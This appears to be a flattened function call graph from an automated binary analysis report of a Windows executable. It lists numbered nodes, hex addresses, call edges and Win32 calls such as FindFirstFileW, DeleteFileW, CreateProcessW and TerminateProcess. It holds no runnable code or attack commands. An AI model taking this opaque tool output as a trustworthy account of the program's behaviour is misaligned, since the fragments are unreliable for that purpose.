e09527 _memmove 98559->98576 98593 e05190 59 API calls Mailbox 98560->98593 98562 e422c0 98599 e6a48d 89 API calls 4 library calls 98562->98599 98564 e422de 98564->98564 98565 e09583 98565->98352 98566 e09944 98568 e20fe6 Mailbox 59 API calls 98566->98568 98567 e0986a 98570 e422b1 98567->98570 98571 e0987f 98567->98571 98575 e096e3 _memmove 98568->98575 98569 e20fe6 59 API calls Mailbox 98569->98576 98598 e7a983 59 API calls 98570->98598 98573 e20fe6 Mailbox 59 API calls 98571->98573 98572 e09741 98572->98567 98581 e422a0 98572->98581 98585 e0977d 98572->98585 98587 e42278 98572->98587 98589 e42253 98572->98589 98594 e08180 298 API calls 98572->98594 98573->98585 98575->98572 98577 e0970e 98575->98577 98579 e20fe6 Mailbox 59 API calls 98575->98579 98576->98562 98576->98565 98576->98566 98576->98569 98576->98572 98578 e096cf 98576->98578 98577->98572 98592 e0cca0 298 API calls 98577->98592 98578->98566 98580 e096dc 98578->98580 98579->98577 98582 e20fe6 Mailbox 59 API calls 98580->98582 98597 e6a48d 89 API calls 4 library calls 98581->98597 98582->98575 98585->98352 98596 e6a48d 89 API calls 4 library calls 98587->98596 98595 e6a48d 89 API calls 4 library calls 98589->98595 98591->98354 98592->98572 98593->98566 98594->98572 98595->98585 98596->98585 98597->98585 98598->98562 98599->98564 98600->98382 98601->98382 98612 e22e74 98602->98612 98604 e22f7b 98604->98369 98605->98382 98606->98382 98607->98382 98608->98382 98609->98377 98610->98382 98611->98382 98613 e22e80 __setmode 98612->98613 98620 e23447 98613->98620 98619 e22ea7 __setmode 98619->98604 98637 e29e3b 98620->98637 98622 e22e89 98623 e22eb8 DecodePointer DecodePointer 98622->98623 98624 e22e95 98623->98624 98625 e22ee5 98623->98625 98634 e22eb2 98624->98634 98625->98624 98683 e289d4 59 API calls __cftoe_l 98625->98683 98627 e22f48 EncodePointer EncodePointer 98627->98624 98628 e22f1c 98628->98624 98632 e22f36 EncodePointer 98628->98632 98685 e28a94 61 API calls 2 library calls 98628->98685 98629 e22ef7 98629->98627 98629->98628 98684 e28a94 61 API calls 2 library calls 98629->98684 98632->98627 98633 e22f30 98633->98624 98633->98632 98686 e23450 98634->98686 98638 e29e5f EnterCriticalSection 98637->98638 98639 e29e4c 98637->98639 98638->98622 98644 e29ec3 98639->98644 98641 e29e52 98641->98638 98668 e232e5 58 API calls 3 library calls 98641->98668 98645 e29ecf __setmode 98644->98645 98646 e29ed8 98645->98646 98648 e29ef0 98645->98648 98669 e2a39b 58 API calls 2 library calls 98646->98669 98655 e29f11 __setmode 98648->98655 98672 e28a4d 58 API calls 2 library calls 98648->98672 98649 e29edd 98670 e2a3f8 58 API calls 7 library calls 98649->98670 98651 e29f05 98653 e29f1b 98651->98653 98654 e29f0c 98651->98654 98658 e29e3b __lock 58 API calls 98653->98658 98673 e28d58 58 API calls __getptd_noexit 98654->98673 98655->98641 98656 e29ee4 98671 e232cf GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 98656->98671 98660 e29f22 98658->98660 98662 e29f47 98660->98662 98663 e29f2f 98660->98663 98675 e22f85 98662->98675 98674 e2a05b InitializeCriticalSectionAndSpinCount 98663->98674 98666 e29f3b 98681 e29f63 LeaveCriticalSection _doexit 98666->98681 98669->98649 98670->98656 98672->98651 98673->98655 98674->98666 98676 e22fb7 __dosmaperr 98675->98676 98677 e22f8e RtlFreeHeap 98675->98677 98676->98666 98677->98676 98678 e22fa3 98677->98678 98682 e28d58 58 API calls __getptd_noexit 98678->98682 98680 e22fa9 GetLastError 98680->98676 98681->98655 98682->98680 98683->98629 98684->98628 98685->98633 98689 e29fa5 LeaveCriticalSection 98686->98689 98688 e22eb7 98688->98619 98689->98688 98690->98400 98691->98389 98692->98400 98693->98398 98694->98400 98696 e6f8f2 98695->98696 98697 e6f898 98695->98697 98771 e6fbb7 59 API calls 98696->98771 98699 e20fe6 Mailbox 59 API calls 98697->98699 98700 e6f89f 98699->98700 98703 e6f8ab 98700->98703 98758 e13df7 60 API calls Mailbox 98700->98758 98702 e6f8ff 98705 e6f9cb 98702->98705 98706 e6f8d9 98702->98706 98712 e6f93f 98702->98712 98704 e04d37 84 API calls 98703->98704 98708 e6f8bd 98704->98708 98751 e68cd0 98705->98751 98706->98405 98759 e13e47 98708->98759 98709 e6f9d2 98755 e6394d 98709->98755 98714 e04d37 84 API calls 98712->98714 98713 e6f8cd 98713->98706 98770 e13f0b CloseHandle 98713->98770 98721 e6f946 98714->98721 98717 e6f9c1 98732 e6399c 98717->98732 98719 e6f97a 98772 e1162d 98719->98772 98721->98717 98721->98719 98722 e142cf CloseHandle 98724 e6fa20 98722->98724 98724->98706 98784 e13f0b CloseHandle 98724->98784 98725 e11c9c 59 API calls 98726 e6f994 98725->98726 98777 e11900 98726->98777 98730 e6399c 66 API calls 98731 e6f9ae Mailbox 98730->98731 98731->98706 98731->98722 98733 e63a15 98732->98733 98734 e639af 98732->98734 98736 e6394d 3 API calls 98733->98736 98734->98733 98735 e639b4 98734->98735 98737 e63a09 98735->98737 98738 e639be 98735->98738 98750 e639fd Mailbox 98736->98750 98802 e63a35 62 API calls Mailbox 98737->98802 98740 e639de 98738->98740 98741 e639c8 98738->98741 98742 e140cd 59 API calls 98740->98742 98788 e140cd 98741->98788 98744 e639e6 98742->98744 98801 e638e0 61 API calls Mailbox 98744->98801 98748 e639dc 98785 e6397e 98748->98785 98750->98731 98752 e68cde 98751->98752 98753 e68cd9 98751->98753 98752->98709 98808 e67d6e 61 API calls 2 library calls 98753->98808 98809 e6384c 98755->98809 98757 e63959 WriteFile 98757->98731 98758->98703 98760 e142cf CloseHandle 98759->98760 98761 e13e53 98760->98761 98818 e142f9 98761->98818 98763 e13e72 98769 e13e95 98763->98769 98826 e13c61 62 API calls Mailbox 98763->98826 98765 e13e84 98827 e1389f 98765->98827 98768 e6394d 3 API calls 98768->98769 98769->98702 98769->98713 98770->98706 98771->98702 98773 e20fe6 Mailbox 59 API calls 98772->98773 98774 e11652 98773->98774 98775 e20fe6 Mailbox 59 API calls 98774->98775 98776 e11660 98775->98776 98776->98725 98778 e4f534 98777->98778 98779 e11914 98777->98779 98781 e11c7e 59 API calls 98778->98781 98841 e118a5 98779->98841 98783 e4f53f __wsetenvp _memmove 98781->98783 98782 e1191f 98782->98730 98784->98706 98786 e6394d 3 API calls 98785->98786 98787 e63990 98786->98787 98787->98750 98789 e20fe6 Mailbox 59 API calls 98788->98789 98790 e140e0 98789->98790 98803 e11c7e 98790->98803 98793 e1402a WideCharToMultiByte 98794 e14085 98793->98794 98795 e1404e 98793->98795 98807 e13f20 59 API calls Mailbox 98794->98807 98797 e20fe6 Mailbox 59 API calls 98795->98797 98798 e14055 WideCharToMultiByte 98797->98798 98806 e13f79 59 API calls 2 library calls 98798->98806 98800 e14077 98800->98748 98801->98748 98802->98750 98804 e20fe6 Mailbox 59 API calls 98803->98804 98805 e11c88 98804->98805 98805->98793 98806->98800 98807->98800 98808->98752 98810 e63853 98809->98810 98811 e6385e 98809->98811 98816 e142ae SetFilePointerEx 98810->98816 98811->98757 98813 e638b8 SetFilePointerEx 98817 e142ae SetFilePointerEx 98813->98817 98815 e638d7 98815->98757 98816->98813 98817->98815 98819 e14312 CreateFileW 98818->98819 98820 e506fc 98818->98820 98822 e14334 98819->98822 98821 e50702 CreateFileW 98820->98821 98820->98822 98821->98822 98823 e50728 98821->98823 98822->98763 98831 e1410a 98823->98831 98826->98765 98828 e138b5 98827->98828 98829 e138a8 98827->98829 98828->98768 98828->98769 98830 e1410a 2 API calls 98829->98830 98830->98828 98838 e14124 98831->98838 98832 e506cc 98840 e142ae SetFilePointerEx 98832->98840 98833 e141ab SetFilePointerEx 98839 e142ae SetFilePointerEx 98833->98839 98836 e1417f 98836->98822 98837 e506e6 98838->98832 98838->98833 98838->98836 98839->98836 98840->98837 98842 e118b4 __wsetenvp 98841->98842 98843 e11c7e 59 API calls 98842->98843 98844 e118c5 _memmove 98842->98844 98845 e4f4f1 _memmove 98843->98845 98844->98782 98847 e0503c 98846->98847 98848 e05041 98846->98848 98847->98848 98968 e237ba 59 API calls 98847->98968 98848->98411 98851 e11207 59 API calls 98850->98851 98852 e2012f 98851->98852 98853 e11207 59 API calls 98852->98853 98854 e20137 98853->98854 98855 e11207 59 API calls 98854->98855 98856 e2013f 98855->98856 98857 e11207 59 API calls 98856->98857 98858 e20147 98857->98858 98859 e5627d 98858->98859 98860 e2017b 98858->98860 98861 e11c9c 59 API calls 98859->98861 98862 e11462 59 API calls 98860->98862 98863 e56286 98861->98863 98864 e20189 98862->98864 98989 e119e1 98863->98989 98982 e11981 98864->98982 98867 e20193 98868 e201be 98867->98868 98869 e11462 59 API calls 98867->98869 98870 e201fe 98868->98870 98872 e201dd 98868->98872 98883 e562a6 98868->98883 98873 e201b4 98869->98873 98969 e11462 98870->98969 98986 e11609 98872->98986 98876 e11981 59 API calls 98873->98876 98874 e2020f 98878 e20221 98874->98878 98881 e11c9c 59 API calls 98874->98881 98875 e56376 98879 e11821 59 API calls 98875->98879 98876->98868 98882 e20231 98878->98882 98884 e11c9c 59 API calls 98878->98884 98890 e56333 98879->98890 98881->98878 98886 e20238 98882->98886 98888 e11c9c 59 API calls 98882->98888 98883->98875 98885 e5635f 98883->98885 98898 e562dd 98883->98898 98884->98882 98885->98875 98892 e5634a 98885->98892 98889 e11c9c 59 API calls 98886->98889 98897 e2023f Mailbox 98886->98897 98887 e11462 59 API calls 98887->98870 98888->98886 98889->98897 98890->98870 98891 e11609 59 API calls 98890->98891 99002 e1153b 59 API calls 2 library calls 98890->99002 98891->98890 98895 e11821 59 API calls 98892->98895 98893 e5633b 98894 e11821 59 API calls 98893->98894 98894->98890 98895->98890 98897->98426 98898->98893 98899 e56326 98898->98899 98993 e11821 98899->98993 98902 e117f2 98901->98902 98903 e4f401 98901->98903 99005 e11680 98902->99005 99011 e587f9 59 API calls _memmove 98903->99011 98906 e117fe 98906->98429 98906->98430 98907 e4f40b 98908 e11c9c 59 API calls 98907->98908 98909 e4f413 Mailbox 98908->98909 99012 e1133d 98910->99012 98913 e63f66 GetLastError 98914 e63f73 CreateDirectoryW 98913->98914 98915 e63f81 98913->98915 98914->98915 98916 e63f7f Mailbox 98914->98916 98915->98916 98917 e11981 59 API calls 98915->98917 98916->98429 98918 e63fc3 98917->98918 98919 e63f1d 59 API calls 98918->98919 98920 e63fcc 98919->98920 98920->98916 98921 e63fd0 CreateDirectoryW 98920->98921 98921->98916 98923 e11207 59 API calls 98922->98923 98924 e63cff 98923->98924 98925 e11207 59 API calls 98924->98925 98926 e63d07 98925->98926 98927 e11207 59 API calls 98926->98927 98928 e63d0f 98927->98928 98929 e11207 59 API calls 98928->98929 98930 e63d17 98929->98930 99016 e20284 98930->99016 98933 e20284 60 API calls 98934 e63d2b 98933->98934 99026 e64f82 98934->99026 98936 e63d36 99037 e64fec GetFileAttributesW 98936->99037 98939 e63d53 98941 e64fec GetFileAttributesW 98939->98941 98940 e11900 59 API calls 98940->98939 98942 e63d5b 98941->98942 98943 e63d68 98942->98943 98945 e11900 59 API calls 98942->98945 98944 e11207 59 API calls 98943->98944 98946 e63d70 98944->98946 98945->98943 98947 e11207 59 API calls 98946->98947 98948 e63d78 98947->98948 98949 e20119 59 API calls 98948->98949 98950 e63d89 FindFirstFileW 98949->98950 98951 e63eb4 FindClose 98950->98951 98963 e63dac Mailbox 98950->98963 98957 e63ebe Mailbox 98951->98957 98952 e63e88 FindNextFileW 98952->98963 98953 e11a36 59 API calls 98953->98963 98955 e11c9c 59 API calls 98955->98963 98956 e117e0 59 API calls 98956->98963 98957->98418 98958 e11900 59 API calls 98958->98963 98959 e6412a 3 API calls 98959->98963 98960 e63eab FindClose 98960->98957 98962 e63e2a 98964 e63e4e MoveFileW 98962->98964 98966 e63e3e DeleteFileW 98962->98966 99093 e1151f 98962->99093 98963->98951 98963->98952 98963->98953 98963->98955 98963->98956 98963->98958 98963->98959 98963->98960 98963->98962 98965 e63ef7 CopyFileExW 98963->98965 98967 e63e6b DeleteFileW 98963->98967 99039 e64561 98963->99039 98964->98963 98965->98963 98966->98963 98967->98963 98968->98848 98970 e11471 98969->98970 98971 e114ce 98969->98971 98970->98971 98973 e1147c 98970->98973 98972 e11981 59 API calls 98971->98972 98979 e1149f _memmove 98972->98979 98974 e11497 98973->98974 98975 e4f1de 98973->98975 99003 e11b7c 59 API calls Mailbox 98974->99003 98976 e11c7e 59 API calls 98975->98976 98978 e4f1e8 98976->98978 98980 e20fe6 Mailbox 59 API calls 98978->98980 98979->98874 98981 e4f208 98980->98981 98983 e1198f 98982->98983 98985 e11998 _memmove 98982->98985 98984 e11aa4 59 API calls 98983->98984 98983->98985 98984->98985 98985->98867 98987 e11aa4 59 API calls 98986->98987 98988 e11614 98987->98988 98988->98870 98988->98887 98990 e119fb 98989->98990 98991 e119ee 98989->98991 98992 e20fe6 Mailbox 59 API calls 98990->98992 98991->98868 98992->98991 98994 e1189a 98993->98994 98995 e1182d __wsetenvp 98993->98995 98996 e11981 59 API calls 98994->98996 98998 e11843 98995->98998 98999 e11868 98995->98999 98997 e1184b _memmove 98996->98997 98997->98890 99004 e11b7c 59 API calls Mailbox 98998->99004 99000 e11c7e 59 API calls 98999->99000 99000->98997 99002->98890 99003->98979 99004->98997 99006 e11692 99005->99006 99009 e116ba _memmove 99005->99009 99007 e20fe6 Mailbox 59 API calls 99006->99007 99006->99009 99008 e1176f _memmove 99007->99008 99010 e20fe6 Mailbox 59 API calls 99008->99010 99009->98906 99010->99008 99011->98907 99013 e1134b 99012->99013 99014 e11981 59 API calls 99013->99014 99015 e1135b GetFileAttributesW 99014->99015 99015->98913 99015->98916 99096 e31b70 99016->99096 99019 e202b0 99021 e11821 59 API calls 99019->99021 99020 e202cd 99022 e119e1 59 API calls 99020->99022 99023 e202bc 99021->99023 99022->99023 99024 e1133d 59 API calls 99023->99024 99025 e202c8 99024->99025 99025->98933 99027 e11207 59 API calls 99026->99027 99028 e64f97 99027->99028 99029 e11207 59 API calls 99028->99029 99030 e64f9f 99029->99030 99031 e20119 59 API calls 99030->99031 99032 e64fae 99031->99032 99033 e20119 59 API calls 99032->99033 99034 e64fbe 99033->99034 99035 e1151f 61 API calls 99034->99035 99036 e64fce Mailbox 99035->99036 99036->98936 99038 e63d41 99037->99038 99038->98939 99038->98940 99040 e6457d 99039->99040 99041 e64582 99040->99041 99042 e64590 99040->99042 99043 e11c9c 59 API calls 99041->99043 99044 e11207 59 API calls 99042->99044 99092 e6458b Mailbox 99043->99092 99045 e64598 99044->99045 99046 e11207 59 API calls 99045->99046 99047 e645a0 99046->99047 99048 e11207 59 API calls 99047->99048 99049 e645ab 99048->99049 99050 e11207 59 API calls 99049->99050 99051 e645b3 99050->99051 99052 e11207 59 API calls 99051->99052 99053 e645bb 99052->99053 99054 e11207 59 API calls 99053->99054 99055 e645c3 99054->99055 99056 e11207 59 API calls 99055->99056 99057 e645cb 99056->99057 99058 e11207 59 API calls 99057->99058 99059 e645d3 99058->99059 99060 e20119 59 API calls 99059->99060 99061 e645ea 99060->99061 99062 e20119 59 API calls 99061->99062 99063 e64603 99062->99063 99064 e11609 59 API calls 99063->99064 99065 e6460f 99064->99065 99066 e64622 99065->99066 99067 e11981 59 API calls 99065->99067 99068 e11609 59 API calls 99066->99068 99067->99066 99069 e6462b 99068->99069 99070 e6463b 99069->99070 99071 e11981 59 API calls 99069->99071 99072 e11c9c 59 API calls 99070->99072 99071->99070 99073 e64647 99072->99073 99074 e117e0 59 API calls 99073->99074 99075 e64653 99074->99075 99098 e64713 59 API calls 99075->99098 99077 e64662 99099 e64713 59 API calls 99077->99099 99079 e64675 99080 e11609 59 API calls 99079->99080 99081 e6467f 99080->99081 99082 e64696 99081->99082 99083 e64684 99081->99083 99084 e11609 59 API calls 99082->99084 99085 e11900 59 API calls 99083->99085 99086 e6469f 99084->99086 99087 e64691 99085->99087 99088 e646bd 99086->99088 99089 e11900 59 API calls 99086->99089 99090 e117e0 59 API calls 99087->99090 99091 e117e0 59 API calls 99088->99091 99089->99087 99090->99088 99091->99092 99092->98963 99100 e114db 99093->99100 99097 e20291 GetFullPathNameW 99096->99097 99097->99019 99097->99020 99098->99077 99099->99079 99101 e114e9 CompareStringW 99100->99101 99106 e4f210 99100->99106 99103 e1150c 99101->99103 99103->98962 99104 e4f25f 99105 e24eb8 60 API calls 99105->99106 99106->99104 99106->99105 99108 e04d37 84 API calls 99107->99108 99109 e7d203 99108->99109 99112 e7d24a Mailbox 99109->99112 99145 e7de8e 99109->99145 99111 e7d617 99196 e7dfb1 92 API calls Mailbox 99111->99196 99112->98438 99115 e7d29b Mailbox 99115->99112 99119 e04d37 84 API calls 99115->99119 99131 e7d4a2 99115->99131 99178 e6fc0d 59 API calls 2 library calls 99115->99178 99179 e7d6c8 61 API calls 2 library calls 99115->99179 99116 e7d626 99117 e7d4b0 99116->99117 99118 e7d632 99116->99118 99158 e7d057 99117->99158 99118->99112 99119->99115 99124 e7d4e9 99173 e20e38 99124->99173 99127 e7d503 99180 e6a48d 89 API calls 4 library calls 99127->99180 99128 e7d51c 99181 e047be 99128->99181 99131->99111 99131->99117 99133 e7d50e GetCurrentProcess TerminateProcess 99133->99128 99137 e7d68d 99137->99112 99141 e7d6a1 FreeLibrary 99137->99141 99138 e7d554 99193 e7dd32 107 API calls _free 99138->99193 99141->99112 99144 e7d565 99144->99137 99194 e04230 59 API calls Mailbox 99144->99194 99195 e0523c 59 API calls 99144->99195 99197 e7dd32 107 API calls _free 99144->99197 99146 e11aa4 59 API calls 99145->99146 99147 e7dea9 CharLowerBuffW 99146->99147 99198 e5f903 99147->99198 99151 e11207 59 API calls 99152 e7dee2 99151->99152 99153 e11462 59 API calls 99152->99153 99154 e7def9 99153->99154 99155 e11981 59 API calls 99154->99155 99156 e7df05 Mailbox 99155->99156 99157 e7df41 Mailbox 99156->99157 99205 e7d6c8 61 API calls 2 library calls 99156->99205 99157->99115 99159 e7d0c7 99158->99159 99160 e7d072 99158->99160 99164 e7e139 99159->99164 99161 e20fe6 Mailbox 59 API calls 99160->99161 99163 e7d094 99161->99163 99162 e20fe6 Mailbox 59 API calls 99162->99163 99163->99159 99163->99162 99165 e7e362 Mailbox 99164->99165 99172 e7e15c _strcat _wcscpy __wsetenvp 99164->99172 99165->99124 99166 e05087 59 API calls 99166->99172 99167 e050d5 59 API calls 99167->99172 99168 e0502b 59 API calls 99168->99172 99169 e04d37 84 API calls 99169->99172 99170 e2593c 58 API calls _W_store_winword 99170->99172 99172->99165 99172->99166 99172->99167 99172->99168 99172->99169 99172->99170 99206 e65e42 61 API calls 2 library calls 99172->99206 99175 e20e4d 99173->99175 99174 e20ee5 CreateProcessW 99176 e20eb3 99174->99176 99175->99174 99175->99176 99177 e20ed3 CloseHandle 99175->99177 99176->99127 99176->99128 99177->99176 99178->99115 99179->99115 99180->99133 99182 e047c6 99181->99182 99183 e20fe6 Mailbox 59 API calls 99182->99183 99185 e047d4 99183->99185 99184 e047e0 99187 e04540 99184->99187 99185->99184 99207 e046ec 59 API calls Mailbox 99185->99207 99208 e04650 99187->99208 99189 e0454f 99190 e20fe6 Mailbox 59 API calls 99189->99190 99191 e045eb 99189->99191 99190->99191 99191->99144 99192 e04230 59 API calls Mailbox 99191->99192 99192->99138 99193->99144 99194->99144 99195->99144 99196->99116 99197->99144 99200 e5f92e __wsetenvp 99198->99200 99199 e5f96d 99199->99151 99199->99156 99200->99199 99201 e5f963 99200->99201 99202 e5fa14 99200->99202 99201->99199 99203 e114db 61 API calls 99201->99203 99202->99199 99204 e114db 61 API calls 99202->99204 99203->99201 99204->99202 99205->99157 99206->99172 99207->99184 99209 e04659 Mailbox 99208->99209 99210 e3d6ec 99209->99210 99215 e04663 99209->99215 99211 e20fe6 Mailbox 59 API calls 99210->99211 99213 e3d6f8 99211->99213 99212 e0466a 99212->99189 99215->99212 99216 e05190 59 API calls Mailbox 99215->99216 99216->99215 99218 e11207 59 API calls 99217->99218 99219 e64024 99218->99219 99220 e11207 59 API calls 99219->99220 99221 e6402d 99220->99221 99222 e11207 59 API calls 99221->99222 99223 e64036 99222->99223 99224 e20284 60 API calls 99223->99224 99225 e64041 99224->99225 99226 e64fec GetFileAttributesW 99225->99226 99227 e6404a 99226->99227 99228 e6405c 99227->99228 99229 e11900 59 API calls 99227->99229 99230 e20119 59 API calls 99228->99230 99229->99228 99231 e64070 FindFirstFileW 99230->99231 99232 e640fc FindClose 99231->99232 99235 e6408f 99231->99235 99237 e64107 Mailbox 99232->99237 99233 e640d7 FindNextFileW 99233->99235 99234 e11c9c 59 API calls 99234->99235 99235->99232 99235->99233 99235->99234 99236 e117e0 59 API calls 99235->99236 99238 e11900 59 API calls 99235->99238 99236->99235 99237->98443 99239 e640c8 DeleteFileW 99238->99239 99239->99233 99240 e640f3 FindClose 99239->99240 99240->99237 99242 e64131 99241->99242 99243 e64965 FindFirstFileW 99241->99243 99242->98278 99243->99242 99244 e6497a FindClose 99243->99244 99244->99242 99245->98465 99246->98475 99247->98472 99249 e7a970 99248->99249 99250 e7a918 99248->99250 99249->98506 99251 e20fe6 Mailbox 59 API calls 99250->99251 99254 e7a93a 99251->99254 99252 e20fe6 Mailbox 59 API calls 99252->99254 99254->99249 99254->99252 99280 e5715b 59 API calls Mailbox 99254->99280 99256 e678ac 99255->99256 99257 e678e3 99255->99257 99256->99257 99258 e20fe6 Mailbox 59 API calls 99256->99258 99259 e56ebc 99257->99259 99258->99257 99260 e56f06 99259->99260 99265 e56f1c Mailbox 99259->99265 99263 e11a36 59 API calls 99260->99263 99261 e56f47 99264 e7c355 298 API calls 99261->99264 99262 e56f5a 99266 e0a820 298 API calls 99262->99266 99263->99265 99274 e56f53 99264->99274 99265->99261 99265->99262 99267 e56f91 99266->99267 99270 e56fdc 99267->99270 99272 e56fc1 99267->99272 99267->99274 99269 e57002 99269->98533 99270->99274 99286 e6a48d 89 API calls 4 library calls 99270->99286 99281 e5706d 99272->99281 99287 e56cf1 59 API calls Mailbox 99274->99287 99275->98533 99276->98516 99277->98522 99278->98534 99279->98538 99280->99254 99282 e57085 99281->99282 99288 e7f1b2 99282->99288 99293 e0ec83 99282->99293 99283 e570d9 99283->99274 99286->99274 99287->99269 99289 e04d37 84 API calls 99288->99289 99290 e7f1cf 99289->99290 99291 e64148 66 API calls 99290->99291 99292 e7f1de 99291->99292 99292->99283 99294 e04d37 84 API calls 99293->99294 99295 e0eca2 99294->99295 99296 e04d37 84 API calls 99295->99296 99297 e0ecb7 99296->99297 99298 e04d37 84 API calls 99297->99298 99299 e0ecca 99298->99299 99300 e04d37 84 API calls 99299->99300 99301 e0ece0 99300->99301 99302 e1162d 59 API calls 99301->99302 99303 e0ecf4 99302->99303 99304 e0ed19 99303->99304 99305 e0502b 59 API calls 99303->99305 99306 e45b67 99304->99306 99328 e0ed43 __wopenfile 99304->99328 99305->99304 99307 e047be 59 API calls 99306->99307 99308 e45b7a 99307->99308 99310 e04540 59 API calls 99308->99310 99309 e047be 59 API calls 99311 e45d4a 99309->99311 99312 e45b8c 99310->99312 99314 e45d97 99311->99314 99315 e45d53 99311->99315 99319 e043d0 59 API calls 99312->99319 99344 e45bb1 99312->99344 99313 e04d37 84 API calls 99316 e0edca 99313->99316 99320 e04540 59 API calls 99314->99320 99318 e04540 59 API calls 99315->99318 99321 e04d37 84 API calls 99316->99321 99317 e0ef0c Mailbox 99317->99283 99324 e45d5e 99318->99324 99319->99344 99325 e45da1 99320->99325 99326 e0eddf 99321->99326 99323 e45c0f 99335 e04540 59 API calls 99323->99335 99364 e0ef3e 99323->99364 99329 e04d37 84 API calls 99324->99329 99327 e043d0 59 API calls 99325->99327 99331 e047be 59 API calls 99326->99331 99326->99364 99330 e45dbd 99327->99330 99328->99313 99328->99323 99357 e0ee30 __wopenfile 99328->99357 99328->99364 99333 e45d70 99329->99333 99341 e04d37 84 API calls 99330->99341 99334 e0edfe 99331->99334 99332 e0477a 59 API calls 99332->99344 99383 e11364 59 API calls 2 library calls 99333->99383 99334->99323 99337 e0ee09 99334->99337 99339 e45c76 99335->99339 99342 e04540 59 API calls 99337->99342 99338 e043d0 59 API calls 99338->99344 99345 e043d0 59 API calls 99339->99345 99340 e45d84 99346 e0477a 59 API calls 99340->99346 99347 e45dd8 99341->99347 99348 e0ee18 99342->99348 99344->99317 99344->99332 99344->99338 99381 e11364 59 API calls 2 library calls 99344->99381 99345->99357 99349 e45d92 99346->99349 99384 e11364 59 API calls 2 library calls 99347->99384 99351 e119e1 59 API calls 99348->99351 99354 e043d0 59 API calls 99349->99354 99351->99357 99352 e0477a 59 API calls 99352->99357 99353 e45dec 99355 e0477a 59 API calls 99353->99355 99354->99317 99355->99349 99357->99317 99357->99352 99358 e45cc2 99357->99358 99371 e11364 59 API calls 2 library calls 99357->99371 99372 e043d0 99357->99372 99359 e45cfb 99358->99359 99360 e45cec 99358->99360 99368 e0477a 99359->99368 99382 e1153b 59 API calls 2 library calls 99360->99382 99364->99309 99365 e043d0 59 API calls 99366 e45d1c 99365->99366 99367 e119e1 59 API calls 99366->99367 99367->99364 99369 e20fe6 Mailbox 59 API calls 99368->99369 99370 e04787 99369->99370 99370->99365 99371->99357 99373 e3d6c9 99372->99373 99375 e043e7 99372->99375 99373->99375 99386 e040cb 59 API calls Mailbox 99373->99386 99376 e04530 99375->99376 99377 e044e8 99375->99377 99380 e044ef 99375->99380 99385 e0523c 59 API calls 99376->99385 99379 e20fe6 Mailbox 59 API calls 99377->99379 99379->99380 99380->99357 99381->99344 99382->99364 99383->99340 99384->99353 99385->99380 99386->99375 99388 e64cf0 99387->99388 99389 e64d09 99387->99389 99388->99389 99392 e64d0f 99388->99392 99393 e2385c GetStringTypeW _iswctype 99388->99393 99394 e237c3 59 API calls __wcstoi64 99389->99394 99392->98550 99393->99388 99394->99392 99395->98309 99396->98309 99397->98313 99398->98304 99399->98326 99400->98304 99401->98304 99402->98330 99403 e27e83 99404 e27e8f __setmode 99403->99404 99440 e2a038 GetStartupInfoW 99404->99440 99406 e27e94 99442 e28dac GetProcessHeap 99406->99442 99408 e27eec 99409 e27ef7 99408->99409 99525 e27fd3 58 API calls 3 library calls 99408->99525 99443 e29d16 99409->99443 99412 e27efd 99413 e27f08 __RTC_Initialize 99412->99413 99526 e27fd3 58 API calls 3 library calls 99412->99526 99464 e2d802 99413->99464 99416 e27f17 99417 e27f23 GetCommandLineW 99416->99417 99527 e27fd3 58 API calls 3 library calls 99416->99527 99483 e35153 GetEnvironmentStringsW 99417->99483 99420 e27f22 99420->99417 99423 e27f3d 99424 e27f48 99423->99424 99528 e232e5 58 API calls 3 library calls 99423->99528 99493 e34f88 99424->99493 99427 e27f4e 99428 e27f59 99427->99428 99529 e232e5 58 API calls 3 library calls 99427->99529 99507 e2331f 99428->99507 99431 e27f61 99432 e27f6c __wwincmdln 99431->99432 99530 e232e5 58 API calls 3 library calls 99431->99530 99513 e15f8b 99432->99513 99435 e27f80 99436 e27f8f 99435->99436 99531 e23588 58 API calls _doexit 99435->99531 99532 e23310 58 API calls _doexit 99436->99532 99439 e27f94 __setmode 99441 e2a04e 99440->99441 99441->99406 99442->99408 99533 e233b7 36 API calls 2 library calls 99443->99533 99445 e29d1b 99534 e29f6c InitializeCriticalSectionAndSpinCount __ioinit 99445->99534 99447 e29d20 99448 e29d24 99447->99448 99536 e29fba TlsAlloc 99447->99536 99535 e29d8c 61 API calls 2 library calls 99448->99535 99451 e29d29 99451->99412 99452 e29d36 99452->99448 99453 e29d41 99452->99453 99537 e28a05 99453->99537 99456 e29d83 99545 e29d8c 61 API calls 2 library calls 99456->99545 99459 e29d62 99459->99456 99461 e29d68 99459->99461 99460 e29d88 99460->99412 99544 e29c63 58 API calls 4 library calls 99461->99544 99463 e29d70 GetCurrentThreadId 99463->99412 99465 e2d80e __setmode 99464->99465 99466 e29e3b __lock 58 API calls 99465->99466 99467 e2d815 99466->99467 99468 e28a05 __calloc_crt 58 API calls 99467->99468 99469 e2d826 99468->99469 99470 e2d891 GetStartupInfoW 99469->99470 99471 e2d831 @_EH4_CallFilterFunc@8 __setmode 99469->99471 99477 e2d8a6 99470->99477 99480 e2d9d5 99470->99480 99471->99416 99472 e2da9d 99559 e2daad LeaveCriticalSection _doexit 99472->99559 99474 e28a05 __calloc_crt 58 API calls 99474->99477 99475 e2da22 GetStdHandle 99475->99480 99476 e2da35 GetFileType 99476->99480 99477->99474 99478 e2d8f4 99477->99478 99477->99480 99479 e2d928 GetFileType 99478->99479 99478->99480 99557 e2a05b InitializeCriticalSectionAndSpinCount 99478->99557 99479->99478 99480->99472 99480->99475 99480->99476 99558 e2a05b InitializeCriticalSectionAndSpinCount 99480->99558 99484 e35164 99483->99484 99485 e27f33 99483->99485 99560 e28a4d 58 API calls 2 library calls 99484->99560 99489 e34d4b GetModuleFileNameW 99485->99489 99487 e3518a _memmove 99488 e351a0 FreeEnvironmentStringsW 99487->99488 99488->99485 99490 e34d7f _wparse_cmdline 99489->99490 99492 e34dbf _wparse_cmdline 99490->99492 99561 e28a4d 58 API calls 2 library calls 99490->99561 99492->99423 99494 e34fa1 __wsetenvp 99493->99494 99495 e34f99 99493->99495 99496 e28a05 __calloc_crt 58 API calls 99494->99496 99495->99427 99500 e34fca __wsetenvp 99496->99500 99497 e35021 99498 e22f85 _free 58 API calls 99497->99498 99498->99495 99499 e28a05 __calloc_crt 58 API calls 99499->99500 99500->99495 99500->99497 99500->99499 99501 e35046 99500->99501 99504 e3505d 99500->99504 99562 e34837 58 API calls __cftoe_l 99500->99562 99502 e22f85 _free 58 API calls 99501->99502 99502->99495 99563 e28ff6 IsProcessorFeaturePresent 99504->99563 